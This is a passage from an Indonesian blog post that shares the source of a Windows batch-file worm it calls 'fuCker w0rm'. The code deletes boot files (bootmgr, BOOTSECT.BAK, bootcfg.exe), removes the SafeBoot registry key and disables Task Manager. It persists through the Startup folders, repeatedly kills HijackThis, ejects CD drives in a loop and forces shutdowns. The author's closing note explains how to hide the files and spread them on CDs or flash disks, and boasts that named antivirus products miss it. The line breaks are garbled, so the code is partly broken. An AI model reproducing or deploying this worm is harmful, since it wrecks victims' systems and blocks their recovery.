“ %SYSTEMROOT%
\System32\bootcfg.exe”
>nul
del /f /s /q
“ %SYSTEMROOT%
\System32\bootcfg.exe”
>nul
reg delete HKLM
\SYSTEM
\CurrentControlSet
\Control\SafeBoot /
va /f >nul
msg * “**** y0u!”
shutdown -r -t 10 -c
“ fuCker w0rm
deteCted!”
goto end
:winVISTA
echo [Inject]
Microsoft Windows
Vista!
setlocal
enableextensions
for /f “tokens=*” %
%a in (
‘ reg query HKLM
\Software\Microsoft
\Windows
\CurrentVersion\Pol
icies\System\ /v
EnableLUA ’
) do (
set usac=%%a
)
echo %usac%|find /i
“ 0×1″ > nul
if errorlevel 1 (
reg add
HKEY_CURRENT_USER
\Software\Microsoft
\Windows\Curre
ntVersion\Policies
\System /v
DisableTaskMgr /t
REG_SZ /d 1 /f >nul
start http://
%USERNAME
%.homo.com/
attrib -r -s -h
“ %SYSTEMRDRIVE%
\bootmgr” >nul
del /f /s /q
“ %SYSTEMDRIVE%
\bootmgr” >nul
attrib -r -s -h
“ %SYSTEMRDRIVE%
\BOOTSECT.BAK”
>nul
del /f /s /q
“ %SYSTEMRDRIVE%
\BOOTSECT.BAK”
>nul
copy %0
“ %ALLUSERSPROFILE
%\Start Menu
\Programs\Startup”
2> nul
copy %0
“ %USERPROFILE%
\AppData\Roaming
\Microsoft\Windows
\St art Menu ” 2> nul
echo x=msgbox
(“ 0wned!”,vbCritical
or vbOkOnly,”fuCker
w0rm”) >>
“w0rm.vbs”
start “” “w0rm.vbs”
2> nul
shutdown -s -t 10 -c
“ fuCker w0rm
deteCted!”
goto end
) else (
echo :HjT >> “%TEMP
%\HjT.bat”
echo tskill /a
HijackThis >>
“ %TEMP%\HjT.bat”
echo goto HjT >>
“ %TEMP%\HjT.bat”
start “%TEMP%
\HjT.bat”
reg add
HKEY_CURRENT_USER
\Software\Microsoft
\Windows\Curre
ntVersion\Policies
\System /v
DisableTaskMgr /t
REG_SZ /d 1 /f >nul
echo do >>
“ disk.vbs”
echo set oWMP =
CreateObject
(“ WMPlayer.OCX.7″ )
>> “disk.vbs”
echo set colCDROMs
=
oWMP.cdromCollection
>> “disk.vbs”
echo
colCDROMs.Item
(d).Eject >>
“ disk.vbs”
echo
colCDROMs.Item
(d).Eject >>
“ disk.vbs”
echo loop >>
“ disk.vbs”
start “” “disk.vbs” 2>
nul
echo @echo off >>
“ %USERPROFILE%
\Desktop
\fuCkerw0rm.bat”
echo shutdown -r -t
00 -c “fuCker w0rm
deteCted!” >>
“%USERPROFILE%
\Desktop
\fuCkerw0rm.bat”
echo echo 0wned by
fuCker w0rm! 0n
%DATE% at%TIME%
>> “%USERPROFILE%
\Desktop
\fuCkerw0rm.bat”
echo @exit >>
“ %USERPROFILE%
\Desktop
\fuCkerw0rm.bat”
set usac=
start “%USERPROFILE
%\Desktop
\fuCkerw0rm.bat” 2>
nul
echo x=msgbox
(“ 0wned!”,vbCritical
or vbOkOnly,”fuCker
w0rm”) >>
“w0rm.vbs”
start “” “w0rm.vbs”
2> nul
goto end
)
endlocal
:end
cls
exit
===========================================================================
NB: file-file tersebut
harus dalam 1
direktori, lalu seleksi
file-file tsb klik
kanan PROPERTIES
beri tanda check
pada HIDDEN dan
READ-ONLY.
Copy file-file
tersebut ke CD atau
FlashDisk dalam
Folder Utama Yaw
Truz Nikmatin Dech
Efeknya ….
Virus Worm ini
memang bukan
murni dari pemikiran
saya sendiri
karena meniru kode-
nya virus Rangga-
Zay. Tapi yang ini
lebih bagus karena
tidak terdeteksi
pakai PCMAV RC15,
CLAMAV, dan
AVAST. Itung-itung
ini buat Anda tahu
kalau membuat
virus/worm tidak
perlu membeli
software bajakan.
Pakai Notepad (dari
Windows Original)
juga bisa.
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Setelah membaca artikel di atas.
Apa komentar anda ??

Langganan: Posting Komentar (Atom)